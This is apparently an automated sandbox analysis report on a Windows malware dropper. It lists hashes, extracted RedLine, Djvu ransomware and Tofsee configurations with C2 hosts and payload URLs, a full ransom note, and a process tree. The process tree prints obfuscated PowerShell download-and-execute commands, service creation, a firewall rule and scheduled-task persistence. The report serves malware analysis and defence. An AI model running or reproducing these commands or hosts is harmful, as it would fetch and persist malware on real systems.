Analysis

  • max time kernel
    4294135s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7-20220310-en
  • submitted
    12-03-2022 18:45

General

  • Target

    81164bb2b8a5b1540b7b6e6b60cf52a1acd91b2ff696f333ebf5304b0be22426.exe

  • Size

    4.2MB

  • MD5

    46d5bc56132505832d81688f7ac1983a

  • SHA1

    68944f0bcddefdba4c5e5243c8168cf044aba6c0

  • SHA256

    81164bb2b8a5b1540b7b6e6b60cf52a1acd91b2ff696f333ebf5304b0be22426

  • SHA512

    d4345cfbed80ddf62ac493a92c1b6beaf3b3fa61cf50a5bd89df314ece24413a831ee6450f5503380754ffe339f1cc7be4882adf44534cd24b976b0091b09f25

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Family

redline

Botnet

Cana

C2

176.111.174.254:56328

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

tofsee

C2

patmushta.info

ovicrush.cn

Extracted

Family

redline

Botnet

ISTALL1

C2

86.107.197.196:63065

Attributes
  • auth_value

    5fe37244c13b89671311b4f994adce81

Extracted

Family

redline

Botnet

Ani

C2

detuyaluro.xyz:80

Signatures

  • Detected Djvu ransomware 2 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 5 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • OnlyLogger Payload 2 IoCs
  • ASPack v2.12-2.42 14 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\81164bb2b8a5b1540b7b6e6b60cf52a1acd91b2ff696f333ebf5304b0be22426.exe
    "C:\Users\Admin\AppData\Local\Temp\81164bb2b8a5b1540b7b6e6b60cf52a1acd91b2ff696f333ebf5304b0be22426.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1564
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1636
      • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS466A1996\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1644
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_1.exe
          4⤵
          • Loads dropped DLL
          PID:1444
          • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_1.exe
            sonia_1.exe
            5⤵
            • Executes dropped EXE
            PID:1984
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_2.exe
          4⤵
          • Loads dropped DLL
          PID:1520
          • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_2.exe
            sonia_2.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            PID:1904
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_3.exe
          4⤵
          • Loads dropped DLL
          PID:1472
          • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_3.exe
            sonia_3.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Modifies system certificate store
            PID:2016
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 940
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:1080
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_4.exe
          4⤵
          • Loads dropped DLL
          PID:992
          • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_4.exe
            sonia_4.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1992
            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1048
            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              6⤵
              • Executes dropped EXE
              PID:1608
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_5.exe
          4⤵
          • Loads dropped DLL
          PID:1244
          • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_5.exe
            sonia_5.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:524
            • C:\Users\Admin\AppData\Local\Temp\is-BTC5O.tmp\sonia_5.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-BTC5O.tmp\sonia_5.tmp" /SL5="$20154,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_5.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1576
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_6.exe
          4⤵
          • Loads dropped DLL
          PID:988
          • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_6.exe
            sonia_6.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1976
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_7.exe
          4⤵
          • Loads dropped DLL
          PID:1824
          • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_7.exe
            sonia_7.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1748
            • C:\Users\Admin\Documents\lIZjlF7JVHSFDy_0lQo6XcgM.exe
              "C:\Users\Admin\Documents\lIZjlF7JVHSFDy_0lQo6XcgM.exe"
              6⤵
              • Executes dropped EXE
              PID:2452
            • C:\Users\Admin\Documents\onH7Kl0MPRsQlhWCV40Nij0R.exe
              "C:\Users\Admin\Documents\onH7Kl0MPRsQlhWCV40Nij0R.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:2496
            • C:\Users\Admin\Documents\Su3aqfKKsV8Yce8gOcdlD306.exe
              "C:\Users\Admin\Documents\Su3aqfKKsV8Yce8gOcdlD306.exe"
              6⤵
              • Executes dropped EXE
              PID:2508
            • C:\Users\Admin\Documents\ZtabfLNnILjgkDmxeQMiUrzW.exe
              "C:\Users\Admin\Documents\ZtabfLNnILjgkDmxeQMiUrzW.exe"
              6⤵
              • Executes dropped EXE
              PID:2536
            • C:\Users\Admin\Documents\qF_G0UmHzWt5_N6CEGBxz638.exe
              "C:\Users\Admin\Documents\qF_G0UmHzWt5_N6CEGBxz638.exe"
              6⤵
              • Executes dropped EXE
              PID:2560
            • C:\Users\Admin\Documents\WNXE4k4JSkqtx8lEurk7AkhP.exe
              "C:\Users\Admin\Documents\WNXE4k4JSkqtx8lEurk7AkhP.exe"
              6⤵
              • Executes dropped EXE
              PID:2596
              • C:\Users\Admin\Documents\WNXE4k4JSkqtx8lEurk7AkhP.exe
                "C:\Users\Admin\Documents\WNXE4k4JSkqtx8lEurk7AkhP.exe"
                7⤵
                  PID:2800
              • C:\Users\Admin\Documents\Zfs7DkM4narBhGUGNAfiqJY9.exe
                "C:\Users\Admin\Documents\Zfs7DkM4narBhGUGNAfiqJY9.exe"
                6⤵
                • Executes dropped EXE
                PID:2660
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\odqlhvxb\
                  7⤵
                    PID:1752
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ddkpvoxu.exe" C:\Windows\SysWOW64\odqlhvxb\
                    7⤵
                      PID:2468
                    • C:\Windows\SysWOW64\sc.exe
                      "C:\Windows\System32\sc.exe" create odqlhvxb binPath= "C:\Windows\SysWOW64\odqlhvxb\ddkpvoxu.exe /d\"C:\Users\Admin\Documents\Zfs7DkM4narBhGUGNAfiqJY9.exe\"" type= own start= auto DisplayName= "wifi support"
                      7⤵
                        PID:2524
                      • C:\Windows\SysWOW64\sc.exe
                        "C:\Windows\System32\sc.exe" description odqlhvxb "wifi internet conection"
                        7⤵
                          PID:2772
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\System32\sc.exe" start odqlhvxb
                          7⤵
                            PID:2696
                          • C:\Windows\SysWOW64\netsh.exe
                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                            7⤵
                              PID:2400
                          • C:\Users\Admin\Documents\NJSDUNRay7U6_LgjHG7mRfNi.exe
                            "C:\Users\Admin\Documents\NJSDUNRay7U6_LgjHG7mRfNi.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:2652
                          • C:\Users\Admin\Documents\si9nhxiSnaL51Onbkay8qwhA.exe
                            "C:\Users\Admin\Documents\si9nhxiSnaL51Onbkay8qwhA.exe"
                            6⤵
                              PID:2720
                            • C:\Users\Admin\Documents\GmQ1ZWXE7O2MWF0z_Wr6kp63.exe
                              "C:\Users\Admin\Documents\GmQ1ZWXE7O2MWF0z_Wr6kp63.exe"
                              6⤵
                                PID:2704
                                • C:\Users\Admin\AppData\Local\Temp\39add75d-0461-4c4a-a3aa-0eb418b2b403.exe
                                  "C:\Users\Admin\AppData\Local\Temp\39add75d-0461-4c4a-a3aa-0eb418b2b403.exe"
                                  7⤵
                                    PID:2928
                                • C:\Users\Admin\Documents\u4ceQNYMkq5HVml9f4dbRqoP.exe
                                  "C:\Users\Admin\Documents\u4ceQNYMkq5HVml9f4dbRqoP.exe"
                                  6⤵
                                    PID:2696
                                  • C:\Users\Admin\Documents\rri_Z8Z37iUG6oUA5Waxri9a.exe
                                    "C:\Users\Admin\Documents\rri_Z8Z37iUG6oUA5Waxri9a.exe"
                                    6⤵
                                      PID:2680
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                        7⤵
                                          PID:1968
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                          7⤵
                                            PID:2504
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                            7⤵
                                              PID:2548
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                              7⤵
                                                PID:2564
                                            • C:\Users\Admin\Documents\rBf9sQ5m0KdcXkkNf_Q5XXXB.exe
                                              "C:\Users\Admin\Documents\rBf9sQ5m0KdcXkkNf_Q5XXXB.exe"
                                              6⤵
                                                PID:2892
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
                                                  7⤵
                                                    PID:2796
                                                    • C:\Windows\system32\mode.com
                                                      mode 65,10
                                                      8⤵
                                                        PID:2224
                                                      • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                        7z.exe e file.zip -p320791618516055 -oextracted
                                                        8⤵
                                                          PID:2088
                                                        • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                          7z.exe e extracted/file_9.zip -oextracted
                                                          8⤵
                                                            PID:2092
                                                          • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                            7z.exe e extracted/file_8.zip -oextracted
                                                            8⤵
                                                              PID:2084
                                                            • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                              7z.exe e extracted/file_7.zip -oextracted
                                                              8⤵
                                                                PID:2520
                                                              • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                7z.exe e extracted/file_6.zip -oextracted
                                                                8⤵
                                                                  PID:2416
                                                                • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                  7z.exe e extracted/file_5.zip -oextracted
                                                                  8⤵
                                                                    PID:2528
                                                                  • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                    7z.exe e extracted/file_4.zip -oextracted
                                                                    8⤵
                                                                      PID:912
                                                                    • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                      7z.exe e extracted/file_3.zip -oextracted
                                                                      8⤵
                                                                        PID:2276
                                                                      • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                        7z.exe e extracted/file_2.zip -oextracted
                                                                        8⤵
                                                                          PID:2296
                                                                        • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                          7z.exe e extracted/file_1.zip -oextracted
                                                                          8⤵
                                                                            PID:2256
                                                                          • C:\Windows\system32\attrib.exe
                                                                            attrib +H "Result_protected.exe"
                                                                            8⤵
                                                                            • Views/modifies file attributes
                                                                            PID:2336
                                                                          • C:\Users\Admin\AppData\Local\Temp\123\Result_protected.exe
                                                                            "Result_protected.exe"
                                                                            8⤵
                                                                              PID:2328
                                                                              • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                                9⤵
                                                                                  PID:1336
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
                                                                                    10⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:1940
                                                                                • C:\Users\Admin\AppData\Local\Temp\222.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\222.exe"
                                                                                  9⤵
                                                                                    PID:2956
                                                                            • C:\Users\Admin\Documents\C3e63H2Bj7QNa4_UHuMu2HjA.exe
                                                                              "C:\Users\Admin\Documents\C3e63H2Bj7QNa4_UHuMu2HjA.exe"
                                                                              6⤵
                                                                                PID:2932
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "C3e63H2Bj7QNa4_UHuMu2HjA.exe" /f & erase "C:\Users\Admin\Documents\C3e63H2Bj7QNa4_UHuMu2HjA.exe" & exit
                                                                                  7⤵
                                                                                    PID:1324
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /im "C3e63H2Bj7QNa4_UHuMu2HjA.exe" /f
                                                                                      8⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:2004
                                                                                • C:\Users\Admin\Documents\rDW9kV2wATNfiStlWQTPF9uN.exe
                                                                                  "C:\Users\Admin\Documents\rDW9kV2wATNfiStlWQTPF9uN.exe"
                                                                                  6⤵
                                                                                    PID:2964
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                                      7⤵
                                                                                        PID:1556
                                                                                    • C:\Users\Admin\Documents\E05Uzx9eKA3zvMNEWPmH7m8U.exe
                                                                                      "C:\Users\Admin\Documents\E05Uzx9eKA3zvMNEWPmH7m8U.exe"
                                                                                      6⤵
                                                                                        PID:2912
                                                                                      • C:\Users\Admin\Documents\lqxps6sCDfGSr41s3zrsyhwx.exe
                                                                                        "C:\Users\Admin\Documents\lqxps6sCDfGSr41s3zrsyhwx.exe"
                                                                                        6⤵
                                                                                          PID:2812
                                                                                        • C:\Users\Admin\Documents\QhVtab6LOQeZXqQy1gDTCw0R.exe
                                                                                          "C:\Users\Admin\Documents\QhVtab6LOQeZXqQy1gDTCw0R.exe"
                                                                                          6⤵
                                                                                            PID:2836
                                                                                          • C:\Users\Admin\Documents\zZlrzGRdfHdbLIlSdV6yYwni.exe
                                                                                            "C:\Users\Admin\Documents\zZlrzGRdfHdbLIlSdV6yYwni.exe"
                                                                                            6⤵
                                                                                              PID:2756
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c sonia_9.exe
                                                                                          4⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:916
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_9.exe
                                                                                            sonia_9.exe
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:1684
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_9.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_9.exe
                                                                                              6⤵
                                                                                                PID:1656
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c sonia_10.exe
                                                                                            4⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:1028
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_10.exe
                                                                                              sonia_10.exe
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:1180
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c sonia_8.exe
                                                                                            4⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:320
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_8.exe
                                                                                              sonia_8.exe
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:1960
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 436
                                                                                            4⤵
                                                                                            • Loads dropped DLL
                                                                                            • Program crash
                                                                                            PID:1772
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\powershell.exe'" /rl HIGHEST /f
                                                                                      1⤵
                                                                                      • Process spawned unexpected child process
                                                                                      • Creates scheduled task(s)
                                                                                      PID:2196
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\apss\lsass.exe'" /rl HIGHEST /f
                                                                                      1⤵
                                                                                      • Process spawned unexpected child process
                                                                                      • Creates scheduled task(s)
                                                                                      PID:1480
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks.exe /create /tn "222" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\lpksetup-20220310-193308-0\222.exe'" /rl HIGHEST /f
                                                                                      1⤵
                                                                                      • Process spawned unexpected child process
                                                                                      • Creates scheduled task(s)
                                                                                      PID:2704
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\DtcInstall\explorer.exe'" /rl HIGHEST /f
                                                                                      1⤵
                                                                                      • Process spawned unexpected child process
                                                                                      • Creates scheduled task(s)
                                                                                      PID:1356
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\cmicryptinstall\csrss.exe'" /rl HIGHEST /f
                                                                                      1⤵
                                                                                      • Process spawned unexpected child process
                                                                                      • Creates scheduled task(s)
                                                                                      PID:1108

                                                                                    Network

                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                    Execution

                                                                                    Scheduled Task

                                                                                    1
                                                                                    T1053

                                                                                    Persistence

                                                                                    Modify Existing Service

                                                                                    2
                                                                                    T1031

                                                                                    New Service

                                                                                    1
                                                                                    T1050

                                                                                    Scheduled Task

                                                                                    1
                                                                                    T1053

                                                                                    Hidden Files and Directories

                                                                                    1
                                                                                    T1158

                                                                                    Privilege Escalation

                                                                                    New Service

                                                                                    1
                                                                                    T1050

                                                                                    Scheduled Task

                                                                                    1
                                                                                    T1053

                                                                                    Defense Evasion

                                                                                    Modify Registry

                                                                                    2
                                                                                    T1112

                                                                                    Disabling Security Tools

                                                                                    1
                                                                                    T1089

                                                                                    Install Root Certificate

                                                                                    1
                                                                                    T1130

                                                                                    Hidden Files and Directories

                                                                                    1
                                                                                    T1158

                                                                                    Credential Access

                                                                                    Credentials in Files

                                                                                    1
                                                                                    T1081

                                                                                    Discovery

                                                                                    System Information Discovery

                                                                                    2
                                                                                    T1082

                                                                                    Query Registry

                                                                                    1
                                                                                    T1012

                                                                                    Peripheral Device Discovery

                                                                                    1
                                                                                    T1120

                                                                                    Collection

                                                                                    Data from Local System

                                                                                    1
                                                                                    T1005

                                                                                    Command and Control

                                                                                    Web Service

                                                                                    1
                                                                                    T1102

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads

                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\libcurl.dll
                                                                                      MD5

                                                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                                                      SHA1

                                                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                      SHA256

                                                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                      SHA512

                                                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\libcurlpp.dll
                                                                                      MD5

                                                                                      e6e578373c2e416289a8da55f1dc5e8e

                                                                                      SHA1

                                                                                      b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                      SHA256

                                                                                      43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                      SHA512

                                                                                      9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS466A1996\libgcc_s_dw2-1.dll
                                                                                      MD5

                                                                                      9aec524b616618b0d3d00b27b6f51da1

                                                                                      SHA1

                                                                                      64264300801a353db324d11738ffed876550e1d3

                                                                                      SHA256

                                                                                      59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                      SHA512

                                                                                      0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

